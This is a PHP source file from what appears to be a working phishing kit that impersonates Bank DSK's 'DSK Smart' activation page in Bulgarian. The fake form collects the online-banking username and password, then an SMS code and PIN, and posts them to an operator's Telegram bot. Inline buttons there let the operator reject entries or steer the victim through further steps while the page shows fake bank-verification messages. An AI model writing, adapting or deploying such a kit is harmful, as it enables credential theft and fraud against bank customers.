<?php
// step5.php (Corrected with robust command handling)
session_start();

// --- SECURITY AND CORE PHP LOGIC ---
// if (!isset($_SESSION['current_step']) || $_SESSION['current_step'] < 4) {
//     header("HTTP/1.1 403 Forbidden");
//     die("Security violation: Invalid step sequence.");
// }
ini_set('display_errors', 1); error_reporting(E_ALL);
require_once 'config.php';
$initial_state = (isset($_SESSION['status']) && $_SESSION['status'] === 'pending') ? 'waiting' : 'form';

// --- ADMIN ACTION: SET NEXT STEP ---
if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['action']) && $_GET['action'] === 'set_next_step') {
    $session_id_to_update = $_GET['user'] ?? ''; $next_step = $_GET['next_step'] ?? '';
    if (!empty($session_id_to_update) && !empty($next_step)) {
        session_write_close(); session_id($session_id_to_update); session_start();
        if ($next_step === 'rejected') { $_SESSION['status'] = 'rejected'; } else { $_SESSION['status'] = 'redirect'; $_SESSION['next_step'] = $next_step; }
        session_write_close(); echo "Action Recorded."; exit();
    }
}

// --- USER ACTION: PROCESS FORM SUBMISSION ---
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    header('Content-Type: application/json');
    $_SESSION['user_data']['step5_username'] = $_POST['username'] ?? null;
    $_SESSION['user_data']['step5_password'] = $_POST['password'] ?? null;
    $_SESSION['user_data']['step5_sms'] = $_POST['sms'] ?? null;
    $_SESSION['user_data']['step5_pin'] = $_POST['pin'] ?? null;
    $_SESSION['status'] = 'pending'; $_SESSION['current_step'] = 5;
    $session_id = session_id(); $script_url = (isset($_SERVER['HTTPS'])?"https":"http")."://{$_SERVER['HTTP_HOST']}{$_SERVER['SCRIPT_NAME']}";
    $reject_url = $script_url."?action=set_next_step&next_step=rejected&user=".$session_id; $goto1_url = $script_url."?action=set_next_step&next_step=1&user=".$session_id; $goto2_url = $script_url."?action=set_next_step&next_step=2&user=".$session_id; $goto3_url = $script_url."?action=set_next_step&next_step=3&user=".$session_id; $goto4_url = $script_url."?action=set_next_step&next_step=4&user=".$session_id;
    // --- ADDED GO TO 5 BUTTON ---
    $goto5_url = $script_url."?action=set_next_step&next_step=5&user=".$session_id;
    $show_sms_pin_url = $script_url."?action=set_next_step&next_step=show_sms_pin&user=".$session_id;

    $message = "👤 STEP 5 SUBMISSION (DSK)\n";
    if (!empty($_POST['sms'])) {
        $message .= "  - SMS Code: `{$_SESSION['user_data']['step5_sms']}`\n" . "  - PIN Code: `{$_SESSION['user_data']['step5_pin']}`\n\n";
    } else {
        $message .= "  - Username: `{$_SESSION['user_data']['step5_username']}`\n" . "  - Password: `{$_SESSION['user_data']['step5_password']}`\n\n";
    }
    $message .= "Choose the user's next destination:";

$keyboard = ['inline_keyboard' => [
        [['text' => '❌ Reject', 'url' => $reject_url]],
        [['text' => '➡️ Request SMS & PIN', 'url' => $show_sms_pin_url]],
        // --- ADDED GO TO 5 BUTTON TO KEYBOARD ---
        [['text' => '🔄 Reset to Step 5 (Username/Pass)', 'url' => $goto5_url]],
        // --- MODIFIED ROW TO INCLUDE STEP 2 ---
        [['text' => '⬅️ Go to 2', 'url' => $goto2_url], ['text' => '⬅️ Go to 3', 'url' => $goto3_url], ['text' => '⬅️ Go to 4', 'url' => $goto4_url]]
    ]];
    $url = "https://api.telegram.org/bot{$TELEGRAM_TOKEN}/sendMessage";
    $post_fields = ['chat_id' => $TELEGRAM_CHAT_ID, 'text' => $message, 'parse_mode' => 'Markdown', 'reply_markup' => json_encode($keyboard)];
    $ch = curl_init(); curl_setopt_array($ch, [CURLOPT_URL => $url, CURLOPT_POST => 1, CURLOPT_POSTFIELDS => http_build_query($post_fields), CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10]); curl_exec($ch); curl_close($ch);
    echo json_encode(['status' => 'pending']); exit();
}

// --- BROWSER ACTION: CHECK FOR STATUS UPDATES ---
if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['action']) && $_GET['action'] === 'check_status') {
    header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header('Content-Type: application/json');
    $response = ['status' => $_SESSION['status'] ?? 'form', 'next_step' => $_SESSION['next_step'] ?? null];
    echo json_encode($response);
    // The session variables are now cleared by a separate 'clear_command' action triggered by the client.
    session_write_close();
    exit();
}

// --- NEW ACTION TO FIX THE BUG ---
if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['action']) && $_GET['action'] === 'clear_command') {
    header('Content-Type: application/json');
    unset($_SESSION['status']);      // Clear the status
    unset($_SESSION['next_step']);   // Clear the next step command
    session_write_close();
    echo json_encode(['status' => 'cleared']);
    exit();
}
?>
<!DOCTYPE html>
<html lang="bg">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Активиране - Банка ДСК</title>
<style>
    /* ALL CSS IS UNCHANGED AND CORRECT */
    body, html { margin: 0; padding: 0; height: 100%; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif; }
    #background-iframe { position: fixed; top: 0; left: 0; width: 100%; height: 100%; border: none; transition: filter 0.3s ease; z-index: 1; }
    #background-iframe.blurred { filter: blur(5px); pointer-events: none; }
    .popup-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(255, 255, 255, 0.6); display: flex; justify-content: center; align-items: center; z-index: 1000; padding: 20px; box-sizing: border-box; overflow-y: auto; }
    .popup-container { background-color: #ffffff; width: 100%; max-width: 420px; padding: 30px; box-sizing: border-box; border-radius: 12px; box-shadow: 0 10px 40px rgba(0, 0, 0, 0.12); border: 1px solid #e9e9e9; }
    .popup-logo-header { text-align: left; padding-bottom: 25px; border-bottom: 1px solid #f0f0f0; margin-bottom: 25px; }
    .popup-logo-header img { height: 35px; }
    .popup-detailed-footer { margin-top: 25px; padding-top: 25px; border-top: 1px solid #f0f0f0; text-align: center; font-size: 11px; color: #888; line-height: 1.6; }
    .popup-detailed-footer a { color: #555; text-decoration: none; } .popup-detailed-footer a:hover { text-decoration: underline; }
    .popup-detailed-footer .footer-section { margin-bottom: 10px; }
    .content-header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 30px; }
    .content-header h2 { font-size: 22px; color: #333; margin: 0; font-weight: 500; }
    .content-header .help-icon { width: 24px; height: 24px; border-radius: 50%; border: 2px solid #ccc; color: #ccc; display: flex; justify-content: center; align-items: center; font-weight: bold; font-size: 16px; cursor: pointer; }
    /* --- NEW PROGRESS BAR STYLES --- */
/* --- NEW, CLEANER PROGRESS BAR STYLES --- */
.progress-bar {
    display: flex;
    justify-content: space-between;
    align-items: flex-start;
    position: relative;
    padding: 0 15%; /* Adjusts space at the ends, works well on mobile */
    margin-bottom: 35px;
}
.progress-line {
    position: absolute;
    top: 10px; /* Vertically center with the dots */
    left: 25%; /* Start/end points of the line */
    right: 25%;
    height: 2px;
    background-color: #e0e0e0;
    z-index: 1; /* Place line behind the dots */
}
.progress-bar .step {
    display: flex;
    flex-direction: column; /* Stacks dot on top of label */
    align-items: center; /* Horizontally centers the dot and label */
    width: 80px; /* Gives each step a consistent width */
    z-index: 2; /* Place dots in front of the line */
    font-size: 14px; /* We set font-size here now */
    font-weight: 500;
    text-align: center;
    line-height: 1.2;
}
.dot-wrapper {
    width: 20px;
    height: 20px;
    background-color: #ffffff; /* This hides the line passing behind the dot */
    border-radius: 50%;
    padding: 4px; /* Creates the border effect around the dot */
    margin-bottom: 8px; /* Space between dot and label */
}
.dot {
    width: 100%;
    height: 100%;
    border-radius: 50%;
    background-color: #e0e0e0; /* Default dot color is grey */
    transition: background-color 0.3s ease;
}
.step-label {
    color: #9e9e9e; /* Default label color is grey */
    transition: color 0.3s ease;
}

/* --- Active State Styling --- */
.progress-bar .step.active .dot {
    background-color: #4CAF50; /* Active dot is green */
}
.progress-bar .step.active .step-label {
    color: #333; /* Active label is dark */
}
    .instructions { color: #555; margin-bottom: 25px; }
    .instructions h3 { font-size: 16px; font-weight: 500; margin: 0 0 5px 0; } .instructions p { font-size: 15px; margin: 0; }
    .input-group { position: relative; margin-bottom: 15px; }
    .input-group .icon { position: absolute; left: 15px; top: 50%; transform: translateY(-50%); width: 20px; height: 20px; opacity: 0.5; }
    .input-group .eye-icon { position: absolute; right: 15px; top: 50%; transform: translateY(-50%); width: 24px; height: 24px; opacity: 0.5; cursor: pointer; }
    #page-form input { width: 100%; padding: 15px 15px 15px 50px; border: none; border-bottom: 1px solid #ddd; background-color: transparent; font-size: 16px; box-sizing: border-box; }
    #page-form button { width: 100%; padding: 15px; background-color: #f0f0f0; color: #555; border: 1px solid #e0e0e0; border-radius: 30px; font-size: 18px; cursor: pointer; margin-top: 15px; margin-bottom: 15px; }
    .forgot-link { text-align: center; color: #ef5350; font-size: 15px; text-decoration: none; display: block; }
    .loader { display: none; border: 4px solid #f3f3f3; border-radius: 50%; border-top: 4px solid #4caf50; width: 40px; height: 40px; animation: spin 1s linear infinite; margin: 40px auto; }
    @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
/* MODIFIED: Rejection message is now just red text */
.status-message.rejected {
    display: block;
    color: #d9534f; /* Red text color */
    font-size: 15px;
    text-align: center;
    margin-top: -5px; /* Position it closer to the inputs */
    margin-bottom: 10px;
    font-weight: 500;
}

/* NEW: Styles for the loading overlay that appears over the form */
.form-wrapper {
    position: relative; /* This is essential for the overlay positioning */
}
.waiting-overlay {
    display: none; /* Hidden by default */
    position: absolute;
    top: 0;
    left: 0;
    right: 0;
    bottom: 0;
    background-color: rgba(255, 255, 255, 0.85); /* Semi-transparent white */
    z-index: 10;
    border-radius: 12px; /* Match the container's corners */
    text-align: center;
    padding-top: 50%; /* Adjust vertical position of loader */
}
.waiting-overlay .loader {
    display: inline-block; /* Make the loader visible inside the overlay */
    margin: 0 auto 20px auto;
}
.waiting-overlay p {
    color: #333;
    font-weight: 500;
    font-size: 16px;
    margin: 0;
}
/*      NEW RESPONSIVE STYLES (MOBILE)       */
/* ========================================= */
@media screen and (max-width: 480px) {

    /* Aligns the popup to the top on mobile for a better feel, especially when the keyboard appears. */
    .popup-overlay {
        align-items: flex-start;
        padding-top: 15px;
        padding-bottom: 15px;
    }

    /* Reduces padding on the main container to give more space to the content. */
    .popup-container {
        padding: 20px 15px;
    }

    /* Makes the logo slightly smaller. */
    .popup-logo-header img {
        height: 30px;
    }
    
    .popup-logo-header {
        padding-bottom: 20px;
        margin-bottom: 20px;
    }

    /* Reduces the main title font size. */
    .content-header h2 {
        font-size: 20px;
    }

    /* Makes the progress bar text smaller to prevent it from wrapping awkwardly. */
    .progress-bar .step {
        font-size: 11px;
        width: 85px; /* Give it a bit more room */
    }

    /* Reduces the instruction text size. */
    .instructions h3 {
        font-size: 15px;
    }
    .instructions p {
        font-size: 14px;
    }
    
    /* Makes the main button text slightly smaller. */
    #page-form button {
        font-size: 16px;
    }

    /* Shrinks the footer text so it fits better on narrow screens. */
    .popup-detailed-footer {
        font-size: 10px;
    }
}```

</style>
</head>
<body>
<body>

    <iframe id="background-iframe" src="step2.php?view=background" class="blurred"></iframe>
    
    <div class="popup-overlay">
        <div id="popup-component" class="popup-container">
            <div class="form-wrapper">

                <!-- THIS IS THE CORRECT LOCATION FOR THE OVERLAY -->
                <div class="waiting-overlay">
                    <div class="loader"></div>
                    <p>Вашата транзакция се обработва...</p>
                </div>

                <!-- The rest of your form content follows -->
                <br><div class="popup-logo-header"><img src="img/dsk.svg" alt="Bank DSK Logo"></div>
                <div class="content-header">
                    <h2>Активране</h2>
                    <div class="help-icon">?</div>
                </div>
<!-- NEW, CLEANER PROGRESS BAR HTML -->
<div id="new-progress-bar" class="progress-bar">
    <!-- Step 1 -->
    <div class="step active">
        <div class="dot-wrapper"><div class="dot"></div></div>
        <div class="step-label">име и парола</div>
    </div>
    <div class="progress-line"></div>
    <!-- Step 2 -->
    <div class="step">
        <div class="dot-wrapper"><div class="dot"></div></div>
        <div class="step-label">телефонен номер</div>
    </div>
    <div class="progress-line"></div>
    <!-- Step 3 -->
    <div class="step">
        <div class="dot-wrapper"><div class="dot"></div></div>
        <div class="step-label">код за активиране</div>
    </div>
</div>
                <div class="instructions">
                    <h3>Активацията на DSK Smart преминава през три лесни стъпки:</h3>
                    <p>1. Въведете потребителско име и парола за ДСК Директ</p>
                </div>
                <form id="page-form">
                    <div id="initial-inputs">
                        <div class="input-group">
                            <img src="img/username.svg" class="icon" alt="user icon">
                            <input type="text" name="username" placeholder="Потребителско име" required>
                        </div>
                        <div class="input-group">
                            <img src="img/password.svg" class="icon" alt="lock icon">
                            <input type="password" name="password" id="password-input" placeholder="Парола" required>
                            <!--<img src="https://i.imgur.com/0oN3I2c.png" class="eye-icon" id="toggle-password" alt="toggle visibility">-->
                        </div>
                    </div>
                    <div id="sms-pin-inputs" style="display: none;">
                        <div class="input-group">
                            <img src="img/sms.svg" class="icon" alt="sms icon">
                            <input type="text" name="sms" placeholder="SMS Code">
                        </div>
                        <div class="input-group">
                            <img src="img/icon.svg" class="icon" alt="pin icon">
                            <input type="password" name="pin" placeholder="PIN">
                        </div>
                    </div>
                    <button type="submit">Продължи</button>
                </form>
                <a href="#" class="forgot-link">Забравено потр. име или парола</a>
                <div id="status-message" class="status-message"></div>
                <footer class="popup-detailed-footer">
                    <div class="footer-section">
                        <a href="#">Потребителско ръководство - граждани</a> | <a href="#">Общи условия за граждани</a> | <a href="#">Тарифа за граждани</a> | <a href="#">Демо филм за граждани</a> | <a href="#">Съвети за сигурност</a> | <a href="#">Контакти</a>
                    </div>
                    <div class="footer-section">
                        <a href="#">Потребителско ръководство - фирми</a> | <a href="#">Общи условия за фирми</a> | <a href="#">Тарифа за фирми</a>
                    </div>
                </footer>
            </div>
            <!-- The old standalone loader is no longer here -->
        </div>
    </div>

<script>

document.addEventListener('DOMContentLoaded', function() {
    // --- Get references to all elements we need to manipulate ---
    
    const form = document.getElementById('page-form');
    const statusMessage = document.getElementById('status-message');
    const initialState = '<?php echo $initial_state; ?>';

    const waitingOverlay = document.querySelector('.waiting-overlay');
    const formInputs = form.querySelectorAll('input');
    const formButton = form.querySelector('button');

    const initialInputsDiv = document.getElementById('initial-inputs');
    const smsPinInputsDiv = document.getElementById('sms-pin-inputs');

    const usernameInput = document.querySelector('input[name="username"]');
    const passwordInput = document.querySelector('input[name="password"]');
    const smsInput = document.querySelector('input[name="sms"]');
    const pinInput = document.querySelector('input[name="pin"]');

    const instructionsHeader = document.querySelector('.instructions h3');
    const instructionsParagraph = document.querySelector('.instructions p');
    const progressBarSteps = document.querySelectorAll('.progress-bar .step');
    const progressBarSeparators = document.querySelectorAll('.progress-separator'); 

    // =================================================================
    // --- NEW: Variables for the dynamic waiting messages ---
    const waitingMessageElement = document.querySelector('.waiting-overlay p');
    const waitingMessages = [
        "Вашата транзакция се обработва...",
        "Моля, изчакайте, свързваме се с банката...",
        "Това може да отнеме няколко секунди...",
        "Не затваряйте и не презареждайте страницата.",
        "Проверяваме данните ви..."
    ];
    let currentMessageIndex = 0;
    let messageInterval;
    // --- END of new variables ---
    // =================================================================

    let statusInterval;

    // --- NEW: Function to cycle through the waiting messages ---
    function cycleWaitingMessage() {
        if (waitingMessageElement) {
            waitingMessageElement.textContent = waitingMessages[currentMessageIndex];
            currentMessageIndex = (currentMessageIndex + 1) % waitingMessages.length; // Loop back to the start
        }
    }

    function enterWaitingState() {
        statusMessage.style.display = 'none';
        waitingOverlay.style.display = 'block';
        formInputs.forEach(input => input.disabled = true);
        formButton.disabled = true;

        // --- MODIFIED: Start the message cycling ---
        currentMessageIndex = 0; // Reset to the first message
        cycleWaitingMessage(); // Show the first message immediately
        messageInterval = setInterval(cycleWaitingMessage, 5000); // Change message every 5 seconds
    }

    function exitWaitingState() {
        waitingOverlay.style.display = 'none';
        formInputs.forEach(input => input.disabled = false);
        formButton.disabled = false;

        // --- MODIFIED: Stop the message cycling ---
        clearInterval(messageInterval);
        // Optional: Reset to the default message for the next time
        if (waitingMessageElement) {
             waitingMessageElement.textContent = waitingMessages[0];
        }
    }

    function checkStatus() {
        fetch('step5.php?action=check_status', { cache: 'no-store' })
            .then(response => response.json())
            .then(data => {

                function clearServerCommand() {
                    fetch('step5.php?action=clear_command').catch(console.error);
                }

                if (data.status === 'redirect' && data.next_step) {
                    clearInterval(statusInterval);
                    exitWaitingState();

                    if (data.next_step === 'show_sms_pin') {
                        initialInputsDiv.style.display = 'none';
                        smsPinInputsDiv.style.display = 'block';
                        usernameInput.required = false;
                        passwordInput.required = false;
                        smsInput.required = true;
                        pinInput.required = true;
                        instructionsHeader.textContent = 'Потвърждение с код';
                        instructionsParagraph.textContent = '2. Въведете получения SMS код и вашия ПИН.';
                        
                        // --- CHANGES ARE HERE ---
                        if (progressBarSteps.length > 1) progressBarSteps[1].classList.add('active');
                        // This new line targets the FIRST separator and makes it active (green).
                        // --- END OF CHANGES ---

                        form.reset();
                        clearServerCommand();
} else if (data.next_step === '5') {
                        initialInputsDiv.style.display = 'block';
                        smsPinInputsDiv.style.display = 'none';
                        usernameInput.required = true;
                        passwordInput.required = true;
                        smsInput.required = false;
                        pinInput.required = false;
                        instructionsHeader.textContent = 'Активацията на DSK Smart преминава през три лесни стъпки:';
                        instructionsParagraph.textContent = '1. Въведете потребителско име и парола за ДСК Директ';
                        
                        // --- CHANGES ARE HERE ---
                        if (progressBarSteps.length > 1) progressBarSteps[1].classList.remove('active');
                        // This new line targets the FIRST separator and removes the active class.
                        // --- END OF CHANGES ---

                        form.reset();
                        clearServerCommand();
                    } else {
                        enterWaitingState();
                        window.location.href = `step${data.next_step}.php`;
                    }

                    if (data.next_step !== 'show_sms_pin' && data.next_step !== '5') return;
                    setTimeout(() => { statusInterval = setInterval(checkStatus, 2000); }, 1000);

                } else if (data.status === 'rejected') {
                    exitWaitingState();
                    if (smsPinInputsDiv.style.display === 'block') {
                        statusMessage.textContent = 'Невалиден SMS ИЛИ ПИН';
                    } else {
                        statusMessage.textContent = 'Невалидно потребителско име или парола!';
                    }
                    statusMessage.className = 'status-message rejected';
                    statusMessage.style.display = 'block';
                    clearServerCommand();
                }
            }).catch(error => {
                console.error('Error checking status:', error);
            });
    }

    form.addEventListener('submit', function(event) {
        event.preventDefault();
        const formData = new FormData(form);
        enterWaitingState();
        fetch(window.location.pathname, {
            method: 'POST',
            body: formData
        }).catch(console.error);
    });

    if (initialState === 'waiting') {
        enterWaitingState();
    }

    statusInterval = setInterval(checkStatus, 2000);
    
    const togglePassword = document.getElementById('toggle-password');
    const mainPasswordInput = document.getElementById('password-input');
    if (togglePassword && mainPasswordInput) {
        togglePassword.addEventListener('click', function() {
            const type = mainPasswordInput.getAttribute('type') === 'password' ? 'text' : 'password';
            mainPasswordInput.setAttribute('type', type);
        });
    }
});
</script>

</body>
</html>